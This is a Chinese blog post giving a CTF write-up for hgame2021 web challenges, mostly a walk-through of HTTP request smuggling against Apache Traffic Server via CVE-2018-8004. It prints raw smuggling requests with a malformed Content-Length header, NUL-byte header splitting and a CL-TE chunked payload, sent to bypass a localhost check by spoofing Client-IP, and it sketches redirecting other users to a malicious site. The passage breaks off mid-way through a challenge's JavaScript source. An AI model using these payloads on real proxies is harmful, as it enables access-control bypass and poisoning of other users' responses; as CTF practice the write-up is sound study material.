<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,ctf,">










<meta name="description" content="大半年没打过CTF了，考完研来复健一下">
<meta name="keywords" content="web,ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="hgame2021 web 复现">
<meta property="og:url" content="http://yoursite.com/2021/01/31/hgame2021-web-wp/index.html">
<meta property="og:site_name" content="k0t0r1の家">
<meta property="og:description" content="大半年没打过CTF了，考完研来复健一下">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/5457632af041c942aa306b25d08418cb.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/e3e13c2987e3643727c748bab5a8a72d.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/a0e3258ac0199e435d64242d8b321ddc.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/304c90bbd7400daa22135da4611f2919.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/9de7c15d77ba0c756a881302dea80657.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/810b40292c25966d86624f881e742252.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/70bbc9740ab33e6adf949236f24e2cd7.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/feef80d5838a37dc7df6df9404d59fec.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/197fc261761df79af07f23ff72a71ac4.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/d2b6ffd292c3511d0ef5eb02eb5aab68.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/fa98acee9935eace42c6e7beed62cec5.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/b06bbd9ec41077bfb1581098f7a18458.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/0b37e16790f1a6bfa7d1cd5c27c7c263.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/6799a8f91dc52f6aa355219bb90435aa.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/083cea019b778569ca28f634d3e4c46d.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/c7fd45b3b462e518450181f9bfc76b81.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/b521f1a60ab87323c3f46da52743211c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/da8d2878b06f061c32fbfd82a6f73687.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/bea07a80797b6fc7027ef3702ebc3444.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/20f4d176e5329b4296116905e98e561c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/e4c40bda3f4006479de48b490ffcdf14.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/73e91ba980043766d368b289d204499e.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/6c1d1d3a275445e31960c92ba179a59c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/ec33b9fb9ead01cbe04c26606fe57968.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/4cceffb7d3a2d395e24600bf77cf47ee.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/883f4b830940ccf88ae700056ce465ed.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/86b476179940b8bff1bb393cf44dfd87.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/2a724d75a46b24d9158dabb3edda0722.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/48cc8a7444940127c7078fcbd32712cd.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/04d7960b790f935d84eb4ca705bb79f9.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/2ac00d6c8ffd1d16339253de8ce1a972.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/676dc302976f3db169f4892e474b92de.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/39dd3943e58e4ccb9385f3346acc5ba7.jpg">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/df4684c03c05c4d588f819a15effb894.png">
<meta property="og:updated_time" content="2021-02-03T16:27:47.983Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="hgame2021 web 复现">
<meta name="twitter:description" content="大半年没打过CTF了，考完研来复健一下">
<meta name="twitter:image" content="http://shifeng-kaze.cn/blog/hgame2021_web_wp/5457632af041c942aa306b25d08418cb.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2021/01/31/hgame2021-web-wp/">





  <title>hgame2021 web 复现 | k0t0r1の家</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">k0t0r1の家</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/01/31/hgame2021-web-wp/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="k0t0r1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://shifeng-kaze.cn/blog/head/kotori.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="k0t0r1の家">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">hgame2021 web 复现</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-01-31T12:43:53+09:00">
                2021-01-31
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>大半年没打过CTF了，考完研来复健一下</p>
<a id="more"></a>
<h1 id="Week1"><a href="#Week1" class="headerlink" title="Week1"></a>Week1</h1><h2 id="Hitchhiking-in-the-Galaxy"><a href="#Hitchhiking-in-the-Galaxy" class="headerlink" title="Hitchhiking_in_the_Galaxy"></a>Hitchhiking_in_the_Galaxy</h2><p>打开页面点击顺风车的链接发现跳回了<code>index.php</code>，查看源码发现<br><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/5457632af041c942aa306b25d08418cb.png" alt=""><br>本应该是去到<code>HitchhikerGuide.php</code>却又跳了回来，应该是<code>302</code>了</p>
<p>那就抓包一下</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/e3e13c2987e3643727c748bab5a8a72d.png" alt=""></p>
<p>405错误，那就用POST试试<br><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/a0e3258ac0199e435d64242d8b321ddc.png" alt=""></p>
<p>改下UA<br><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/304c90bbd7400daa22135da4611f2919.png" alt=""></p>
<p>再改下Referer<br><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/9de7c15d77ba0c756a881302dea80657.png" alt=""></p>
<p>加上XFF<br><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/810b40292c25966d86624f881e742252.png" alt=""></p>
<p>少一个回车就会超时，害</p>
<h2 id="watermelon"><a href="#watermelon" class="headerlink" title="watermelon"></a>watermelon</h2><p>这题感觉应该是道js题，但怎么都找不到发送分数的api，于是就直接打到2k分出来了</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/70bbc9740ab33e6adf949236f24e2cd7.png" alt=""></p>
<p>真的是qnm的大西瓜，看flag <code>hgame{do_you_know_cocos_game?}</code> 像是<code>Cocos2d-x</code>游戏引擎的题，八成也是分析js，等wp出来再看看吧</p>
<h2 id="宝藏走私者"><a href="#宝藏走私者" class="headerlink" title="宝藏走私者"></a>宝藏走私者</h2><p>这题进入<code>/secret</code>提示需要有<code>Client-IP</code>并以<code>localhost</code>访问，于是带上<code>Client-IP</code>伪造一下果然失败了</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/feef80d5838a37dc7df6df9404d59fec.png" alt=""></p>
<p>于是尝试找能<code>ssrf</code>的地方，不过就两个页面也没啥功能，又尝试了一下也不行</p>
<p>再回去看看http包</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/197fc261761df79af07f23ff72a71ac4.png" alt=""></p>
<p>发现服务器是个没看过的，于是就去查ATS的漏洞，查到了两个CVE，不过想应该不会出CVE的题吧于是就略过了，结果没找到什么东西。疯狂挠头一阵后回去看到题目的名字，突然就想到了<code>http走私</code>，于是和ATS一起查了一下居然就查到了，就是刚刚被忽略了<code>CVE-2018-8004</code><br>后来hint中也给出了文章<br><a href="https://paper.seebug.org/1048/" target="_blank" rel="noopener">协议层的攻击——HTTP请求走私</a></p>
<p>这里要先了解两个东西，ATS和http走私<br>ATS全称<code>Apache Traffic Server</code>，一般架构于网络边缘，用于进行反向代理、缓存储存<br>然后重点是http走私<br>上面的文章也说得很清楚了，htt走私主要是由于前端与后端对http请求处理不一致所导致的，主要分为五种</p>
<h3 id="前端处理CL-Content-Length-而后端不处理"><a href="#前端处理CL-Content-Length-而后端不处理" class="headerlink" title="前端处理CL(Content-Length)而后端不处理"></a>前端处理CL(Content-Length)而后端不处理</h3><p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/d2b6ffd292c3511d0ef5eb02eb5aab68.png" alt=""></p>
<p>结果就是像这样的请求，由于前端根据CL值为44判断是一个请求，而后端不处理CL，直接就认为了这是两个请求</p>
<h3 id="同一请求中有两个CL，而前端只处理第一个，后端处理第二个（CL-CL）"><a href="#同一请求中有两个CL，而前端只处理第一个，后端处理第二个（CL-CL）" class="headerlink" title="同一请求中有两个CL，而前端只处理第一个，后端处理第二个（CL-CL）"></a>同一请求中有两个CL，而前端只处理第一个，后端处理第二个（CL-CL）</h3><p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/fa98acee9935eace42c6e7beed62cec5.png" alt=""></p>
<p>比如像这样一个请求，前端读取第一个CL认为请求体包括了<code>12345\r\na</code>，而后端读取第二个CL，认为请求体只包括到了<code>12345\r\n</code>。于是后面的<code>a</code>就到了缓冲区之中，当又有用户进行这样一个访问时</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/b06bbd9ec41077bfb1581098f7a18458.png" alt=""></p>
<p>就会出现没有<code>aGET</code>请求的错误</p>
<h3 id="在http请求中存在CL和TE-Transfer-Encoding-，前端只处理的是CL，后端只处理TE（CL-TE）"><a href="#在http请求中存在CL和TE-Transfer-Encoding-，前端只处理的是CL，后端只处理TE（CL-TE）" class="headerlink" title="在http请求中存在CL和TE(Transfer-Encoding)，前端只处理的是CL，后端只处理TE（CL-TE）"></a>在http请求中存在CL和TE(Transfer-Encoding)，前端只处理的是CL，后端只处理TE（CL-TE）</h3><p>在<code>Transfer-Encoding: chunked</code>下数据格式是这样的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[chunk size][\r\n][chunk data][\r\n][chunk size][\r\n][chunk data][\r\n][chunk size = 0][\r\n][\r\n]</span><br></pre></td></tr></table></figure>
<p>分块大小的值在前，后面是分块数据。当到尾部时，分块大小的值为0，然后以<code>\r\n\r\n</code>结束</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/0b37e16790f1a6bfa7d1cd5c27c7c263.png" alt=""></p>
<p>像这样的一个请求，前端处理CL后认为请求体为6，包括<code>0\r\n\r\nG</code>。而后端处理TE后，检测到<code>0\r\n\r\n</code>就认为这个请求已经结束了，<code>G</code>就进入了缓冲区。结果就是再发送一个正常的POST请求进来，就会出现没有<code>GPOST</code>请求的错误</p>
<h3 id="前端只处理TE，后端只处理CL（TE-CL）"><a href="#前端只处理TE，后端只处理CL（TE-CL）" class="headerlink" title="前端只处理TE，后端只处理CL（TE-CL）"></a>前端只处理TE，后端只处理CL（TE-CL）</h3><p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/6799a8f91dc52f6aa355219bb90435aa.png" alt=""></p>
<p>像这个请求，前端接受后检测到<code>0\r\n\r\n</code>后才认为请求结束，于是就把<code>12\r\nGPOST / HTTP/1.1\r\n\r\n0\r\n\r\n</code>认为是属于请求体的。而后端根据CL值，认为<code>12\r\n</code>请求就结束了，于是连续访问后就会出现没有<code>GPOST</code>请求的错误</p>
<h3 id="前后端都处理TE"><a href="#前后端都处理TE" class="headerlink" title="前后端都处理TE"></a>前后端都处理TE</h3><p>这时虽然处理相同了，但我们可以通过对TE进行混淆，使得其中一个服务器不处理TE，结果造成<code>TE-CL</code>/<code>CL-TE</code>的http走私</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/083cea019b778569ca28f634d3e4c46d.png" alt=""></p>
<p>像这个请求，尝试用两个TE去混淆，使得后端服务器不处理TE只处理CL，造成<code>TE-CL</code>的http走私</p>
<p>而由<code>CVE-2018-8004</code>爆出的ATS的http走私漏洞存在于<code>6.0.0~6.2.2</code>和<code>7.0.0~7.1.3</code>中，该题中的版本是<code>7.1.2</code>正好可以用。而后续官方对该漏洞提供了4个补丁，同时也是四种利用</p>
<h3 id="3192-如果字段名称后面和冒号前面有空格，则返回400"><a href="#3192-如果字段名称后面和冒号前面有空格，则返回400" class="headerlink" title="3192 如果字段名称后面和冒号前面有空格，则返回400"></a><a href="https://github.com/apache/trafficserver/pull/3192" target="_blank" rel="noopener">3192 如果字段名称后面和冒号前面有空格，则返回400</a></h3><p>若在请求中，在一条请求头的请求字段和<code>:</code>之间存在空格字段时，AST不会对其做处理，将其作为正常字段处理，然后直接转发给后端服务器。而当后端服务器处理不了有空格的字段时就会产生问题，像<code>Nginx</code>就会无视该条请求头，不会响应400错误</p>
<p>在这题中我们构造这样的请求</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">Content-Length : 49</span><br><span class="line"></span><br><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">foo:</span><br></pre></td></tr></table></figure>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/c7fd45b3b462e518450181f9bfc76b81.png" alt=""></p>
<p>第一次访问时访问的是<code>/</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/b521f1a60ab87323c3f46da52743211c.png" alt=""></p>
<p>当我们连续地再访问一次时就访问到了<code>/secret</code><br>原因就是ATS接到请求后，没有去处理<code>Content-Length : 49</code>字段与<code>:</code>之间的空格，并认为该GET请求的请求体长度为49，将其作为一个请求发给了后端。而后端处理不了<code>Content-Length : 49</code>，将其忽略，结果就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">foo:</span><br></pre></td></tr></table></figure>
<p>进入了缓冲区，当我们再访问一次时，后端会响应的请求就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">foo:GET / HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br></pre></td></tr></table></figure>
<p>结果就访问到了<code>/secret</code><br>解这道题的方式就是把<code>Client-IP: 127.0.0.1</code>放到第二条请求中，连续访问就行了</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/da8d2878b06f061c32fbfd82a6f73687.png" alt=""></p>
<h3 id="3201-当返回400错误时，关闭连接"><a href="#3201-当返回400错误时，关闭连接" class="headerlink" title="3201 当返回400错误时，关闭连接"></a><a href="https://github.com/apache/trafficserver/pull/3201" target="_blank" rel="noopener">3201 当返回400错误时，关闭连接</a></h3><p>在<code>CVE-2018-8004</code>所涉及到的ATS版本中，当ATS接收到的请求造成了400错误，依旧不会关闭建立了的TCP连接</p>
<p>这题中我们构造这样的一个请求</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">aa:\0bb</span><br><span class="line">cc:dd</span><br><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br></pre></td></tr></table></figure>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/bea07a80797b6fc7027ef3702ebc3444.png" alt=""></p>
<p>可以看到服务器响应了两个<code>Bad Request</code><br>当AST解析这个请求时，遇到了<code>NULL(\0)</code>，于是进行截断成两个请求</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">aa:</span><br></pre></td></tr></table></figure>
<p>和</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">bb</span><br><span class="line">cc:dd</span><br><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br></pre></td></tr></table></figure>
<p>由于遇到了<code>NULL</code>，AST就直接对第一个请求响应了400。而第二个请求也明显不符合规范，于是也响应了400</p>
<p>修改一下请求再尝试</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">aa:\0bb</span><br><span class="line">cc:dd</span><br><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br></pre></td></tr></table></figure>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/20f4d176e5329b4296116905e98e561c.png" alt=""></p>
<p>可以看到这次请求中，第二个请求正常响应了。这里其实我不太理解，第二个请求应该是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bb</span><br><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br></pre></td></tr></table></figure>
<p>应该也不符合http的规范才对，但却成功响应了，试了几次后发现只要第二个请求行前没有两行都能成功响应，这要去翻翻ATS的手册看看了</p>
<p>除此之外我们也可以通过这种方式进行http走私</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">aa:\0bb</span><br><span class="line">GET http://thief.0727.site/secret HTTP/1.1</span><br></pre></td></tr></table></figure>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/e4c40bda3f4006479de48b490ffcdf14.png" alt=""></p>
<p>通过这种方式，我们可以将第二个请求设置为恶意网站。将这个请求发送给AST服务器，然后等待下一个访问该服务器的用户，这个用户收到的响应就会是我们设置的恶意网站上。不过虽然理论上可行，但利用的条件比较苛刻。像这道题就不适合使用这种攻击</p>
<h3 id="3231-验证请求中的Content-Length头"><a href="#3231-验证请求中的Content-Length头" class="headerlink" title="3231 验证请求中的Content-Length头"></a><a href="https://github.com/apache/trafficserver/pull/3231" target="_blank" rel="noopener">3231 验证请求中的Content-Length头</a></h3><p>更加详细的描述是<br>当<code>Content-Length</code>请求头不匹配时，响应400，删除具有相同<code>Content-Length</code>请求头的重复副本，如果存在<code>Transfer-Encoding</code>请求头，则删除<code>Content-Length</code>请求头</p>
<p>也就是说在修复漏洞之前，可能存在<code>CL-TE</code>的利用<br>像上面分析的，构造报文</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">Content-Length: 6</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">0</span><br><span class="line"></span><br><span class="line">G</span><br></pre></td></tr></table></figure>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/73e91ba980043766d368b289d204499e.png" alt=""></p>
<p>连续访问两次后出现405错误<br>这题中我们就直接在下面构造一个新请求，并带上<code>Client-IP:127.0.0.1</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/6c1d1d3a275445e31960c92ba179a59c.png" alt=""></p>
<p>连续访问后，第二次的请求就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">Client-IP:127.0.0.1</span><br><span class="line">aa:bb</span><br><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: thief.0727.site</span><br><span class="line">Content-Length: 73</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">0</span><br></pre></td></tr></table></figure>
<p>这样就成功伪装成<code>127.0.0.1</code>了</p>
<h3 id="3251-当缓存命中时，清空请求体"><a href="#3251-当缓存命中时，清空请求体" class="headerlink" title="3251 当缓存命中时，清空请求体"></a><a href="https://github.com/apache/trafficserver/pull/3251" target="_blank" rel="noopener">3251 当缓存命中时，清空请求体</a></h3><p>也就是说，在未修复前，当缓存命中之后，是不会清空请求体，将请求体作为第二个请求去处理<br>像这样</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/ec33b9fb9ead01cbe04c26606fe57968.png" alt=""></p>
<p>不过这题看起来没有开启AST的缓存功能，因此无法利用</p>
<p>这题写得比较详细主要还是因为之前没实际做过http走私的题，就把<code>CVE-2018-8004</code>中每个利用都尝试了一下，熟练熟练</p>
<h2 id="智商检测鸡"><a href="#智商检测鸡" class="headerlink" title="智商检测鸡"></a>智商检测鸡</h2><p>这题做得太窒息了，进去就是一个定积分（刚考完研已经ptsd了）</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/4cceffb7d3a2d395e24600bf77cf47ee.png" alt=""></p>
<p>做是不可能做的，看了下源码发现就几个接口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line">function getStatus()&#123;</span><br><span class="line">    $.ajax(&#123;</span><br><span class="line">        type:&quot;GET&quot;,</span><br><span class="line">        url: &quot;/api/getStatus&quot;,</span><br><span class="line">        dataType:&quot;json&quot;,</span><br><span class="line">        success:function(data)&#123;</span><br><span class="line">            let solving = data[&apos;solving&apos;]</span><br><span class="line">            $(&quot;#status&quot;).text(solving);</span><br><span class="line">            if(solving === 100)</span><br><span class="line">                getFlag();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function getQuestion()&#123;</span><br><span class="line">    $.ajax(&#123;</span><br><span class="line">        type: &quot;GET&quot;,</span><br><span class="line">        url: &quot;/api/getQuestion&quot;,</span><br><span class="line">        dataType: &quot;json&quot;,</span><br><span class="line">        xhrFields: &#123;</span><br><span class="line">            withCredentials: true</span><br><span class="line">        &#125;,</span><br><span class="line">        crossDomain: true,</span><br><span class="line">        success:function(data)&#123;</span><br><span class="line">            $(&apos;#integral&apos;).html(data[&apos;question&apos;]);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function getFlag()&#123;</span><br><span class="line">    